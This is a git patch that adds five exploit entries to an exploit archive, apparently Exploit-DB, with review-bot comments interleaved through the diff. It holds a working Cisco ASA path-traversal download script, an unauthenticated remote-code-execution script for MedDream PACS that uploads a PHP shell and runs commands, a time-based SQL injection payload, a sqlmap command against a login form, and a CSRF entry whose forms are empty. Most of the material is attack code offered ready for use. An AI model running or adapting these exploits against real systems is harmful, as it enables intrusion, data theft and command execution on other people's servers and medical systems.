From 14fcd4863ffe7100decfcb1175c939b16ec5032d Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 13 Oct 2020 05:02:09 +0000 Subject: [PATCH] DB: 2020-10-13 5 changes to exploits/shellcodes Small CRM 2.0 - 'email' SQL Injection MedDream PACS Server 6.8.3.751 - Remote Code Execution (Unauthenticated) Liman 0.7 - Cross-Site Request Forgery (Change Password) Online Students Management System 1.0 - 'username' SQL Injections Cisco ASA and FTD 9.6.4.42 - Path Traversal --- exploits/hardware/webapps/48871.txt | 25 +++++++ exploits/multiple/webapps/48869.txt | 64 +++++++++++++++++ exploits/php/webapps/48867.txt | 41 +++++++++++ exploits/php/webapps/48868.py | 103 ++++++++++++++++++++++++++++ exploits/php/webapps/48870.txt | 51 ++++++++++++++ files_exploits.csv | 5 ++ 6 files changed, 289 insertions(+) create mode 100644 exploits/hardware/webapps/48871.txt create mode 100644 exploits/multiple/webapps/48869.txt create mode 100644 exploits/php/webapps/48867.txt create mode 100755 exploits/php/webapps/48868.py create mode 100644 exploits/php/webapps/48870.txt diff --git a/exploits/hardware/webapps/48871.txt b/exploits/hardware/webapps/48871.txt new file mode 100644 index 000000000..9cd3cfbb3 --- /dev/null +++ b/exploits/hardware/webapps/48871.txt 
@@ -0,0 +1,25 @@ +# Exploit Title: Cisco ASA and FTD 9.6.4.42 - Path Traversal +# Date: 2020-10-10 +# Exploit Author: 3ndG4me +# Vendor: www.cisco.com +# Product: https://www.cisco.com/c/en/us/products/security/asa-firepower-services/index.html +# CVE : CVE-2020-3452 + + + +TARGET=$1 +CISCO_KNOWN_FILES="logo.gif http_auth.html user_dialog.html localization_inc.lua portal_inc.lua include nostcaccess.html ask.html no_svc.html svc.html session.js useralert.html ping.html help app_index.html tlbr portal_forms.js logon_forms.js win.js portal.css portal.js sess_update.html blank.html noportal.html portal_ce.html portal.html home logon_custom.css portal_custom.css preview.html session_expired custom portal_elements.html commonspawn.js common.js appstart.js appstatus relaymonjar.html relaymonocx.html relayjar.html relayocx.html portal_img color_picker.js color_picker.html cedhelp.html cedmain.html cedlogon.html cedportal.html cedsave.html cedf.html ced.html lced.html files 041235123432C2 041235123432U2 pluginlib.js shshim do_url clear_cache connection_failed_form apcf ucte_forbidden_data ucte_forbidden_url cookie session_password.html tunnel_linux.jnlp tunnel_mac.jnlp sdesktop gp-gip.html auth.html wrong_url.html logon_redirect.html logout.html logon.html test_chargen" +mkdir cisco_asa_files + +if [ -z "$1" ]; +then + echo "Usage: cve-2020-3452.sh " + echo "Example: cve-2020-3452.sh mytarget.com" + echo "Files that are downloaded will be in the newly created 'cisco_asa_files' directory" + echo "Target not specificed...exiting..." +else + for FILE in $CISCO_KNOWN_FILES; + do + curl "https://$TARGET/+CSCOT+/translation-table?type=mst&textdomain=%2bCSCOE%2b/${FILE}&default-language&lang=../" | tee cisco_asa_files/$FILE; + done +fi \ No newline at end of file diff --git a/exploits/multiple/webapps/48869.txt b/exploits/multiple/webapps/48869.txt new file mode 100644 index 000000000..1e983f8a6 --- /dev/null +++ b/exploits/multiple/webapps/48869.txt 
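Review bot: The header records CVE-2020-3452 but not the fixed release or any mitigation, so an operator reading this entry learns what is exposed but not what to change; add `# Fixed in: [FIXED_RELEASE — placeholder, take from the vendor advisory]` under the `# CVE` line. The same gap is in the other four new entries (48869, 48867, 48868, 48870), none of which states a fix or a mitigation. A `# Detection:` line would also help here: every request in the `for` loop carries `lang=../` on the `/+CSCOT+/translation-table` path, which is a distinctive string to alert on in proxy or appliance web logs. Separately, `mkdir cisco_asa_files` sits before the `-z "$1"` usage check, so running the script with no argument still creates the directory.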
@@ -0,0 +1,64 @@ +# Exploit Title: Liman 0.7 - Cross-Site Request Forgery (Change Password) +# Date: 2020-10-07 +# Exploit Author: George Tsimpidas +# Software Link : https://github.com/salihciftci/liman/releases/tag/v0.7 +# Version: 0.7 +# Tested on: Ubuntu 18.04.5 LTS (Bionic Beaver) +# Category: Webapp + +Description: + +There is no CSRF protection in Liman application, with a little help +of social engineering (like sending a link via email/chat) an attacker may +force the victim to click on a malicious link, with the purpose of +manipulating his current account information, or changing entirely his +password. + +Vulnerable Endpoints : + +http://127.0.0.1:5000/settings/profile +http://127.0.0.1:5000/settings/password + +Proof of Concept + + +Download the application, make an account and login inside the +panel under : http://127.0.0.1:5000 expose the docker port on 5000. + + +Save this .html files and send it to victim (Victim should be +logged in in the browser) + +Crafted value will be added. + +Account Information CSRF : + + + + + +
+ + + + + + + + +Password Change CSRF : + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/exploits/php/webapps/48867.txt b/exploits/php/webapps/48867.txt new file mode 100644 index 000000000..e07bfb8af --- /dev/null +++ b/exploits/php/webapps/48867.txt @@ -0,0 +1,41 @@ +# Exploit Title: Small CRM 2.0 - 'email' SQL Injection +# Google Dork: N/A +# Date: 2020-10-10 +# Exploit Author: Ahmet Ümit BAYRAM +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/small-crm-php/ +# Version: V2.0 +# Tested on: Kali Linux +# CVE : N/A + +========== Vulnerable Code ========== + +mysqli_query $row1 = mysqli_query($con, "select email,password from user +where email='" . $_POST['email'] . "'"); // dbconnection.php + +========== Post Request ==================== + +POST /crm/forgot-password.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 +Firefox/68.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: localhost/crm/forgot-password.php +Content-Type: application/x-www-form-urlencoded +Content-Length: 20 +Connection: close +Cookie: __test=ec283e73906679549573af64209a5d5b; +PHPSESSID=4d272f5938b3ec9c60bb45c4d7b44497 +Upgrade-Insecure-Requests: 1 + +email=test@test.com&submit= + +============= Vulnerable Parameter =============== + +email (POST) + +============= Payload ========================= + +' AND (SELECT 1543 FROM (SELECT(SLEEP(5)))gSRd) AND 'PCOX'='PCOX \ No newline at end of file diff --git a/exploits/php/webapps/48868.py b/exploits/php/webapps/48868.py new file mode 100755 index 000000000..9a12154ec --- /dev/null +++ b/exploits/php/webapps/48868.py 
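Review bot: The quoted vulnerable query is annotated `// dbconnection.php`, yet the request that reaches it is `POST /crm/forgot-password.php`, so the file attribution looks wrong or at least incomplete; name the file that actually runs the `mysqli_query` call. The entry also stops at the payload without saying how the query should be written: a remediation line such as `$stmt = mysqli_prepare($con, "select email,password from user where email=?"); mysqli_stmt_bind_param($stmt, "s", $_POST['email']);` under the "Vulnerable Code" section would give the reader the fix alongside the bug.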
@@ -0,0 +1,103 @@ +#!/usr/bin/python +# +# Exploit Title: MedDream PACS Server 6.8.3.751 - Remote Code Execution (Unauthenticated) +# Exploit Author: bzyo +# Twitter: @bzyo_ +# Date: 10-10-2020 +# Vulnerable Software: https://www.softneta.com/products/meddream-pacs-server/ +# Vendor Homepage: https://www.softneta.com +# Version: 6.8.3.751 +# Tested On: Windows 2016 +# +# +# Update to EB 48853 < AUTHENTICATION WAS NOT NEEDED LOLZ +# +##PoC## +# +# 1. create one line php shell to call commands +# 2. run script on attacking machine +# 3. enter parameters; IP, filename, command +# +# +# root@kali:~# python meddream.py +# Enter IP Address: 192.168.0.223 +# Enter payload filename + .php: cmd.php +# Enter command: whoami +# 170759 +#
nt authority\system
+# 
+# http://192.168.0.223/Pacs/upload/20201010-170759--cmd.php?cmd=whoami +# 404 +# 404 +# 404 +# 404 +# 404 +# 404 +# 404 +# 404 +# 404 +# +# + +from urllib2 import urlopen +import requests +import sys +import time +from datetime import datetime, timedelta + +ip_addr = raw_input("Enter IP Address: ") +user_file = raw_input("Enter payload filename + .php: ") +cmd = raw_input("Enter command: ") + +URL= 'http://' + ip_addr + '/Pacs/uploadImage.php' + +def main(): + session = requests.Session() + + files = [ + ('actionvalue', (None, 'Attach', None)), + ('uploadfile', (user_file, open(user_file, 'rb'), 'application/x-php')), + ('action', (None, 'Attach', None)), + ] + + site = session.post(URL, files=files) + + today = datetime.today() + upload_date = today.strftime("%Y%m%d") + + less = 1 + now1 = datetime.now() + up_time1 = now1.strftime("%H%M%S") + print(up_time1) + #varying time checks +/- + now2 = now1 - timedelta(seconds=less) + up_time2 = now2.strftime("%H%M%S") + now3 = now2 - timedelta(seconds=less) + up_time3 = now3.strftime("%H%M%S") + now4 = now3 - timedelta(seconds=less) + up_time4 = now4.strftime("%H%M%S") + now5 = now4 - timedelta(seconds=less) + up_time5 = now5.strftime("%H%M%S") + now6 = now5 - timedelta(seconds=less) + up_time6 = now6.strftime("%H%M%S") + now7 = now6 - timedelta(seconds=less) + up_time7 = now7.strftime("%H%M%S") + now8 = now1 + timedelta(seconds=less) + up_time8 = now8.strftime("%H%M%S") + now9 = now8 + timedelta(seconds=less) + up_time9 = now8.strftime("%H%M%S") + now10 = now1 + timedelta(seconds=less) + up_time10 = now9.strftime("%H%M%S") + + + up_time_array = [up_time1, up_time2, up_time3, up_time4, up_time5, up_time6, up_time7, up_time8, up_time9, up_time10] + for i in up_time_array: + r = session.get('http://' + ip_addr + '/Pacs/upload/'+ upload_date + "-" + i + "--" + user_file + "?cmd=" + cmd) + if r.status_code == 200: + print r.content + print r.url + else: + print ("404") + +if __name__ == '__main__': + main() \ No newline at 
end of file diff --git a/exploits/php/webapps/48870.txt b/exploits/php/webapps/48870.txt new file mode 100644 index 000000000..64f107795 --- /dev/null +++ b/exploits/php/webapps/48870.txt @@ -0,0 +1,51 @@ +# Title: Online Students Management System 1.0 - 'username' SQL Injections +# Exploit Author: George Tsimpidas +# Date: 2020-10-09 +# Vendor Homepage: www.sourcecodester.com +# Software Link: +https://www.sourcecodester.com/sites/default/files/download/janobe/studentrecord_0.zip +# Version : 1.0 +# Tested on: Ubuntu 18.04.5 LTS (Bionic Beaver) +# Category: Webapp + +# Description + +The files index.php on the main login page, and the index.php on the +/admin/ login page does not perform input validation on the regno +and username parameters. An attacker can send malicious input in the post +request to http://localhost/index.php or either +http://localhost/admin/index.php and bypass authentication, extract +sensitive information etc. + +#POC + +1) Navigate to the admin login page + +Example: + +http://localhost/admin/index.php + +2) Fill in dummy values for 'username' and 'password' fields and send the +request via an HTTP intercept tool + +3) Save the request to file. Example, student_record_sqli.req + +POST /admin/index.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 +Firefox/78.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 32 +Origin: http://localhost +DNT: 1 +Connection: close + +username=admin&password=dummy + +4) Run SQLmap on the file, + +sqlmap -r student_record_sqli.req --dbms=mysql --threads=10 -p username \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index b5f7176d9..64458a210 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
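Review bot: `open(user_file, 'rb')` inside the `files` list is never closed, and `urlopen`, `sys` and `time` are imported but never used; open the payload in a `with` block around the `session.post` call and drop the three unused imports. The header also gives a defender nothing to act on: the sample output shows uploaded scripts being served from `/Pacs/upload/` under a `<YYYYMMDD>-<HHMMSS>--<filename>.php` name, so `# Detection: .php files appearing under /Pacs/upload/` and `# Fixed in: [FIXED_VERSION — placeholder, take from the vendor advisory]` belong under the `# Version:` line.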
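Review bot: The description says the main `index.php` is injectable through `regno` and the `/admin/` one through `username`, but the title, the csv entry and the sqlmap line (`-p username`) only cover `username`; either list both parameters in the title or restrict the description to what the PoC demonstrates. A remediation line is also missing: both login pages should pass `regno` and `username` as bound parameters of a prepared statement rather than interpolating them into the query.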
@@ -40685,6 +40685,11 @@ id,file,description,date,author,type,platform,port
 48864,exploits/php/webapps/48864.txt,"Kentico CMS 9.0-12.0.49 - Persistent Cross Site Scripting",2020-10-09,"Ataberk YAVUZER",webapps,php,
 48865,exploits/php/webapps/48865.txt,"DynPG 4.9.1 - Persistent Cross-Site Scripting (Authenticated)",2020-10-09,"Enes Özeser",webapps,php,
 48866,exploits/json/webapps/48866.txt,"openMAINT 1.1-2.4.2 - Arbitrary File Upload",2020-10-09,mrb3n,webapps,json,
+48867,exploits/php/webapps/48867.txt,"Small CRM 2.0 - 'email' SQL Injection",2020-10-12,"Ahmet Ümit BAYRAM",webapps,php,
+48868,exploits/php/webapps/48868.py,"MedDream PACS Server 6.8.3.751 - Remote Code Execution (Unauthenticated)",2020-10-12,bzyo,webapps,php,
+48869,exploits/multiple/webapps/48869.txt,"Liman 0.7 - Cross-Site Request Forgery (Change Password)",2020-10-12,"George Tsimpidas",webapps,multiple,
+48870,exploits/php/webapps/48870.txt,"Online Students Management System 1.0 - 'username' SQL Injections",2020-10-12,"George Tsimpidas",webapps,php,
+48871,exploits/hardware/webapps/48871.txt,"Cisco ASA and FTD 9.6.4.42 - Path Traversal",2020-10-12,3ndG4me,webapps,hardware,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,